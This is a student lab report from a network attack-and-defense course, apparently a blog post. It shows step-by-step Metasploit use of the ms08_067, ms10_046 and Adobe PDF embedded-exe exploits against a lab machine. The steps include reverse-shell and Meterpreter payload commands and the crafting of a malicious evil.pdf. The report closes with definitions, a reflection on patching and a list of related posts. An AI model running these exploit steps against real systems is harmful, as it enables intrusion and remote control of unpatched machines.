20155233 《网络对抗》 Exp5 MSF基础应用
主动攻击:ms08_067漏洞攻击
启用msf终端
msfconsole
然后使用search命令搜索该漏洞对应的模块:search ms08_067
选择输入
use exploit/windows/smb/ms08_067_netapi
,之后查看信息:show payloads
,选择攻击载荷set payload generic/shell_reverse_tcp
查看配置渗透攻击所需的配置项
show options
,查看渗透攻击模块所能成功渗透攻击的目标平台show targets
根据目标情况配置渗透攻击的各个选项
回连成功,进行相关命令测试
对浏览器攻击:ms10_046漏洞攻击
基本步骤同上,先利用指令
search ms10_046
找到可以攻击的模块
我们这里选择第一个,输入命令
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
输入
show payloads
选择攻击载荷,我们选择generic/shell_reverse_tcp
,输入命令set payload generic/shell_reverse_tcp
使用
根据目标情况配置渗透攻击的各个选项,输入命令
show options
查看配置设置并进行修改
输入
exploit
执行
可以看到生成了所需的URL,在靶机浏览器访问后,kal得到相应但没有出现预期效果
对配置进行修改,选用
set payload windows/meterpreter/reverse_tcp
,设置后查看结果,输入sessions
查看到一个ID号为1的会话
使用
sessions -i 1
选择会话1,成功获取了靶机的shell,利用systeminfo
指令查看靶机的系统信息
对Adobe的漏洞攻击:adobe_pdf_embedded_exe
输入
search adobe
查询和adobe漏洞有关的模块,我选择exploit/windows/fileformat/adobe_pdf_embedded_exe
选择攻击载荷payload,这里我选
windows/meterpreter/reverse_tcp
输入命令
set payload windows/meterpreter/reverse_tcp
使用攻击载荷
根据目标情况配置渗透攻击的各个选项
执行,查看结果
- 可以看到在相应目的生成了
evil.pdf
,我们来将它发送到靶机 输入相关命令打开监听
回连成功,输入命令查看系统信息
辅助模块的应用:scanner/http/options,功能Display available HTTP options for each system
- 输入命令
show auxiliary
查看辅助模块,并挑选使用scanner/http/options
- 输入命令
use scanner/http/options
,输入info
查看信息
设置参数
exploit
执行
基础问题回答
- 用自己的话解释什么是exploit,payload,encode.
exploit
是漏洞利用,我们执行exploit后,我们所运送的程序或代码就开始去寻找漏洞,并控制它为我们服务。
payload
是有效载荷,在我们执行exploit后,谁来运送程序或代码呢?这个payload就是关键的一个环节。
encode
是编码,对我们的程序或代码进行伪装,使其避免被查收。
实验体会
通过本次实验,使我加深了对平时计算机下补丁的意识,本次实验是让我们知道如何根据特定漏洞去攻击特定系统,一个漏洞只能攻击没有装相应补丁的系统,可想而知漏洞的重要性,如果漏洞被发现,而没有装补丁,我们的系统就赤裸裸的暴露在黑客手下,而我们却毫不自知,所以我们要及时安装补丁,要养成网络安全意识,尽可能避免病毒、木马的入侵,提高专业知识,掌握相应技能。
20155233 《网络对抗》 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
- 20155218《网络对抗》MSF基础应用
20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...
- 20155304《网络对抗》MSF基础应用
20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...
随机推荐
- LeetCode题解之Max Consecutive Ones
1.题目描述 2.问题分析 遍历一次数组,以每个1 为起点向后数,数到0 时比较当前1的个数和最大1 的个数,然后将遍历的起点放到当前0 的后面. 3.代码 int findMaxConsecutiv ...
- Prometheus Node_exporter 之 Network Netstat
Network Netstat /proc/net/netstat 1. Netstat IP In / Out type: GraphUnit: shortLabel: Datagrams out ...
- python之绘制图形库turtle
关于绘制图形库turtle# 画布上,默认有一个坐标原点为画布中心的坐标轴(0,0),默认"standard"模式坐标原点上有一只面朝x轴正方向小乌龟 一:海龟箭头Turtle相关 ...
- 拉格朗日插值和牛顿插值 matlab
1. 已知函数在下列各点的值为 0.2 0.4 0.6 0.8 1.0 0.98 0.92 0.81 0.64 0.38 用插值法对数据进行拟合,要求给出Lagrange插值多项式和Newto ...
- sql点滴45—mysql中group_concat用法
group_concat(),手册上说明:该函数返回带有来自一个组的连接的非NULL值的字符串结果.比较抽象,难以理解. 通俗点理解,其实是这样的:group_concat()会计算哪些行属于同一组, ...
- 团队作业——Alpha冲刺 11/12
团队作业--Alpha冲刺 冲刺任务安排 杨光海天 今日任务:预览界面布局实现,并留下交互接口 明日任务:预览界面中自定义保存的实现 郭剑南 今日任务:尝试解决Python编写程序无法在Android ...
- Sqlite的安装和简单使用
Sqlite 1 安装 首先,下载相应的版本: https://sqlite.org/download.html 其次,解压到本地,并添加到环境变量. 然后,打开 CMD 创建,输入 sqlite3 ...
- python提示警告InsecureRequestWarning
在Python3中使用以下代码报错: import requests response = requests.get(url='', verify=False) 错误代码如下: InsecureReq ...
- Netty入门(十)解码分隔符和基于长度的协议
我们需要区分不同帧的首尾,通常需要在结尾设定特定分隔符或者在首部添加长度字段,分别称为分隔符协议和基于长度的协议,本节讲解 Netty 如何解码这些协议. 一.分隔符协议 Netty 附带的解码器可以 ...
- 【转】使用Chrome Frame,彻底解决浏览器兼容问题
本文转自http://www.ryanbay.com/?p=269,感谢该作者的总结 X-UA-Compatible是自从IE8新加的一个设置,对于IE8以下的浏览器是不识别的. 通过在meta中设置 ...